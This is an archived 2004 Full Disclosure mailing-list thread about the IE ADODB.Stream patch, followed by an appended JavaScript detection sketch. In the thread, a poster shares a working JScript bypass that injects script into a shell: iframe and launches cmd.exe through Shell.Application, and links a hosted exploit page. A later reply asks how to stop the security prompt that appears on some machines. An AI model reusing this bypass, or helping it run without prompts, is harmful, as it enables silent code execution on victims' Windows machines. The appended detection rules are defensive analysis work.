Full Disclosure mailing list archives

RE: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out


From: "Mr. John" <johnspood () yahoo com>
Date: Sat, 3 Jul 2004 02:50:07 -0700 (PDT)

It is OK, but it causes a security alert on some
machines because of "unsafe component". It isn't good
for us. But it is interesting that only on some
machines this security alert is prompted; on most WinXP,
cmd.exe will run without any prompt.
What is your idea?


--- Jelmer <jkuperus () planet nl> wrote:
Because we avoid the adodb.stream issue altogether.
You can patch it, but if you leave open other
issues, well, it's pointless.
Instead we just swap in this instead of the old
shellcode:


-- snip --

function injectIt() {
 document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);

--snip--


And it's working again, how long did it take? What,
like an hour since
Microsoft's announcement?




-----Original Message-----
From: Pascal Zoutendijk
[mailto:Pascal.Zoutendijk () tbwa nl] 
Sent: vrijdag 2 juli 2004 23:28
To: hescominsoon () emmanuelcomputerconsulting com;
jkuperus () planet nl
Cc: helmut_hauser () hotmail com;
full-disclosure () lists netsys com
Subject: Betr.: Re: [Full-disclosure] Fix for IE
ADODB.Stream vulnerability
is out

what you should be getting (assuming the patch does
work) is something like the following:

line: 3
char: 3
Error: Access is denied
Code: 0

etc...

dunno why it doesn't work on some systems though.

Met vriendelijke groet,

Pascal Zoutendijk
TBWA \ ICT Services
Prof W.H. Keesomlaan 8
1183 DJ  Amstelveen, the Netherlands
Tel: +31205715300
Fax:+31205715639

William Warren <hescominsoon () emmanuelcomputerconsulting com> 02-07-04 22:24

I have an Athlon XP 2000+, not a slow system.  I am
running IE6 SP1
all patched up..for this test..my main browser is
Mozilla
obviously Mozilla is immune to this one..:)

Jelmer wrote:

That depends, are you using firefox? ;)

It works on my ie6 sp1 + latest and greatest
*cough* patches
It does however use settimeout, maybe you have a
low end system, and you
need a longer wait, just try reloading it a couple
of times


-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On
Behalf Of William
Warren
Sent: vrijdag 2 juli 2004 20:47
To: Jelmer
Cc: 'Helmut Hauser';
full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Fix for IE
ADODB.Stream vulnerability is
out

this returns an error..is that all it is supposed
to do?


Jelmer wrote:


Too bad it won't do you one ounce any good


http://62.131.86.111/security/idiots/malware2k/installer.htm

Credit: http-equiv




-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On
Behalf Of Helmut Hauser
Sent: vrijdag 2 juli 2004 18:39
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] Fix for IE ADODB.Stream
vulnerability is out






http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=4d056748-c538-46f6-b7c8-2fbfd0d237e3

Better late than never ...

Helmut Hauser

_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.netsys.com/full-disclosure-charter.html






-- 
My "Foundation" verse:
Isa 54:17  No weapon that is formed against thee
shall prosper; 
and every tongue that shall rise against thee in
judgment thou 
shalt condemn. This is the heritage of the servants
of the LORD, 
and their righteousness is of me, saith the LORD.

-- carpe ductum -- "Grab the tape"



_____________________________________________________________________
This message has been checked for all known viruses.









        
                

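The point made in the quoted reply, that blocking one component leaves the rest of the technique usable, can be seen from the detection side. The following is an added example, not code from the thread or from Microsoft: it compares a check keyed only on the ADODB.Stream ProgID with one keyed on the primitives the posted snippet combines (a `shell:` frame, markup written into that frame, ActiveX instantiation). Rule ids, function names and sample strings are constructed assumptions.

```javascript
// Added example: detection sketch, not code from the thread.
// Rule ids, function names and sample strings are constructed for illustration.

// Check A: a one-entry ProgID denylist, i.e. a fix aimed only at ADODB.Stream.
const PROGID_DENYLIST = ["adodb.stream"];

// Check B: the primitives the posted snippet combines, whatever object is created.
const PRIMITIVE_RULES = [
  // frame or iframe whose src uses the shell: scheme (local resource)
  { id: "LOCAL_FRAME", re: /<i?frame\b[^>]*\bsrc\s*=\s*["']?\s*shell:/i },
  // script that writes markup into a child frame's document
  { id: "FRAME_INJECT", re: /\bframes\s*\[[^\]]*\][\s\S]{0,80}?\b(insertAdjacentHTML|innerHTML|write)\b/i },
  // any scripted ActiveX instantiation
  { id: "ACTIVEX_NEW", re: /new\s+ActiveXObject\s*\(/i },
];

// Collect the ProgIDs passed to ActiveXObject, lower-cased.
function progIds(html) {
  const re = /new\s+ActiveXObject\s*\(\s*["']([^"']+)/gi;
  const found = [];
  let m;
  while ((m = re.exec(html)) !== null) found.push(m[1].toLowerCase());
  return found;
}

function verdict(html) {
  const hits = PRIMITIVE_RULES.filter((r) => r.re.test(html)).map((r) => r.id);
  return {
    denylist: progIds(html).some((p) => PROGID_DENYLIST.includes(p)),
    hits,
    // Suspicious: a shell: frame together with injection or ActiveX use.
    suspicious: hits.includes("LOCAL_FRAME") && hits.length >= 2,
  };
}

// Constructed, inert samples: neither string runs a command.
const SAMPLE_OLD = '<script>var s = new ActiveXObject("ADODB.Stream");</script>';
const SAMPLE_VARIANT =
  '<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>' +
  "<script>document.frames[0].document.body.insertAdjacentHTML('afterBegin'," +
  "'new ActiveXObject(\"Shell.Application\")');</script>";
const SAMPLE_BENIGN = '<iframe src="https://example.com/"></iframe>';

for (const [name, s] of [["old", SAMPLE_OLD], ["variant", SAMPLE_VARIANT], ["benign", SAMPLE_BENIGN]]) {
  console.log(name, JSON.stringify(verdict(s)));
}
```

The denylist check fires only on the ADODB.Stream sample, while the primitive-based check flags the variant regardless of which ProgID it names.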

